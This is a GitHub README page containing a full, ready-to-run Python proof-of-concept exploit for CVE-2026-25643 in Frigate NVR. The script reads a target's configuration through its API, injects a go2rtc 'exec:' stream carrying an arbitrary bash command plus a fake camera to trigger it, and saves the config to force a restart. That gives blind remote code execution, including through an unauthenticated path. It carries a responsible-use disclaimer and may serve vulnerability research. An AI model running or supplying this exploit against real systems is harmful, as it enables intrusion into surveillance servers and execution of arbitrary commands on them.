README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Frigate NVR ≤ 0.16.3 Blind RCE Exploit
CVE-2026-25643
This Python exploit targets a critical configuration manipulation vulnerability
in Frigate NVR versions up to 0.16.3 (both authenticated and unauthenticated paths).
By injecting a malicious go2rtc stream and a fake camera entry,
it triggers arbitrary command execution as the Frigate process during service restart —
no reverse shell or output capture required.
Author: Joshua van der poll (https://github.com/joshuavanderpoll)
Created: February 2026
Version: 1.0
License: GNU General Public License v3.0 (GPL-3.0)
Disclaimer: Use responsibly. This is a proof-of-concept for a patched
vulnerability (fixed in Frigate ≥ 0.16.4). Do not use against
systems you do not own or have explicit permission to test.
Credits / References:
- jduardo2704/CVE-2026-25643-Frigate-RCE
Usage:
python3 exploit.py -u http://target:5000 -c "touch /tmp/pwned"
python3 exploit.py -u https://target -U admin -P password -c "id > /tmp/id.txt"
"""
import requests
import argparse
import sys
import json
import urllib3
import yaml
import time
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Colors
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BLUE = '\033[94m'
CYAN = '\033[96m'
RESET = '\033[0m'
def print_status(msg, color=BLUE, symbol="[*]"):
print(f"{color}{symbol} {msg}{RESET}")
def print_success(msg):
print_status(msg, GREEN, "[+]")
def print_warning(msg):
print_status(msg, YELLOW, "[!]")
def print_error(msg, exc=None):
print_status(msg, RED, "[-]")
if exc:
print(f" → {type(exc).__name__}: {exc}")
import traceback
traceback.print_exc(limit=2)
def login_frigate(session, base_url, username, password):
print_status(f"Trying to authenticate as '{username}' ...")
try:
resp = session.post(
f"{base_url}/api/login",
json={"user": username, "password": password},
verify=False,
timeout=12
)
print_status(f"Login → status code: {resp.status_code}", CYAN)
if resp.status_code == 200:
print_success("Login successful")
return True
else:
print_warning(f"Login failed - status: {resp.status_code}")
if resp.text.strip():
print(f" Response: {resp.text[:180].strip()}")
return False
except Exception as e:
print_error("Login request failed", e)
return False
def fetch_config(session, base_url):
print_status("Fetching current configuration (/api/config/raw) ...")
try:
resp = session.get(f"{base_url}/api/config/raw", timeout=12, verify=False)
print_status(f"Config fetch → HTTP {resp.status_code}", CYAN)
if resp.status_code != 200:
print_error(f"Cannot read config - status {resp.status_code}")
if resp.text.strip():
print(f" Body preview: {resp.text[:200]}")
return None
content = resp.text.strip()
print_status(f"Received {len(content)} bytes", CYAN)
# Handle possible JSON string wrapping or direct YAML
if content.startswith('"') and content.endswith('"'):
try:
content = json.loads(content)
print_status("Config was JSON-wrapped → unwrapped", CYAN)
except:
pass
try:
config = yaml.safe_load(content)
if not isinstance(config, dict):
print_error("Parsed config is not a dictionary")
return None
print_success(f"Config parsed successfully ({len(config)} top-level keys)")
return config
except yaml.YAMLError as e:
print_error("YAML parsing failed", e)
print(f" Raw content preview: {content[:300]}")
return None
except Exception as e:
print_error("Failed to fetch/parse configuration", e)
return None
def send_config(session, base_url, config_data, save_option="restart"):
yaml_payload = yaml.dump(config_data, allow_unicode=True, sort_keys=False)
bytes_size = len(yaml_payload.encode())
print_status(f"Sending modified config ({bytes_size:,} bytes) with option: {save_option}")
try:
resp = session.post(
f"{base_url}/api/config/save?save_option={save_option}",
data=yaml_payload,
headers={"Content-Type": "text/plain"},
timeout=10,
verify=False
)
print_status(f"Config save → HTTP {resp.status_code}", CYAN)
if resp.status_code in (200, 204):
print_success("Configuration accepted (server should restart)")
else:
print_warning(f"Config rejected - status {resp.status_code}")
if resp.text.strip():
print(f" Server response: {resp.text[:300].strip()}")
except requests.Timeout:
print_warning("Request timed out - server might be restarting already")
except Exception as e:
print_error("Failed to send modified configuration", e)
def inject_command_into_config(config, command):
print_status(f"Preparing payload → executing: {command}")
payload = f"bash -c '{command}'"
print_status(f"Using payload: {payload}", CYAN)
# go2rtc → streams
if 'go2rtc' not in config:
config['go2rtc'] = {}
if 'streams' not in config['go2rtc']:
config['go2rtc']['streams'] = {}
config['go2rtc']['streams']['debug_cmd'] = [f"exec:{payload}"]
print_success("Injected malicious stream → debug_cmd")
# Fake camera to trigger execution
if 'cameras' not in config:
config['cameras'] = {}
config['cameras']['trigger_exec'] = {
'ffmpeg': {
'inputs': [{
'path': 'rtsp://127.0.0.1:8554/debug_cmd',
'roles': ['detect']
}]
},
'detect': {'enabled': False},
'audio': {'enabled': False},
'enabled': True
}
print_success("Injected trigger camera → trigger_exec")
return config
def exploit_command(base_url, username, password, command):
session = requests.Session()
session.verify = False
# Authentication
if username and password:
login_frigate(session, base_url, username, password)
else:
print_warning("No credentials provided → attempting unauthenticated access")
# Get current config
config = fetch_config(session, base_url)
if not config:
print_error("Exploit aborted - cannot continue without valid config")
sys.exit(1)
# Modify config with our command
try:
modified_config = inject_command_into_config(config, command)
except Exception as e:
print_error("Failed to prepare malicious config", e)
sys.exit(1)
# Small delay
time.sleep(1.2)
# Send modified config
send_config(session, base_url, modified_config)
print("\n" + "="*60)
print(f" {GREEN}Payload sent! Command should execute during go2rtc init / camera probe.{RESET}")
print(" Keep in mind:")
print(" • Output is NOT captured (blind execution)")
print(" • Command runs as the user/frigate process")
print(" • Multiple executions may occur during restart")
print("="*60 + "\n")
def main():
parser = argparse.ArgumentParser(
description="Frigate <= 0.16.3 RCE – execute blind command (CVE-2026-25643)"
)
parser.add_argument('-u', '--url', required=True, help="Target URL (http(s)://host:port)")
parser.add_argument('-U', '--username', required=False, help="Username (optional)")
parser.add_argument('-P', '--password', required=False, help="Password (optional)")
parser.add_argument('-c', '--cmd', required=True, help="Command to execute on target")
args = parser.parse_args()
base_url = args.url.rstrip('/')
print(f"\n {BLUE}Target :{RESET} {base_url}")
if args.username:
print(f" {BLUE}User :{RESET} {args.username}")
print(f" {BLUE}Command:{RESET} {args.cmd}\n")
try:
exploit_command(
base_url=base_url,
username=args.username,
password=args.password,
command=args.cmd
)
except KeyboardInterrupt:
print_warning("Interrupted by user")
sys.exit(2)
except Exception as e:
print_error("Unexpected fatal error", e)
sys.exit(3)
if __name__ == "__main__":
main()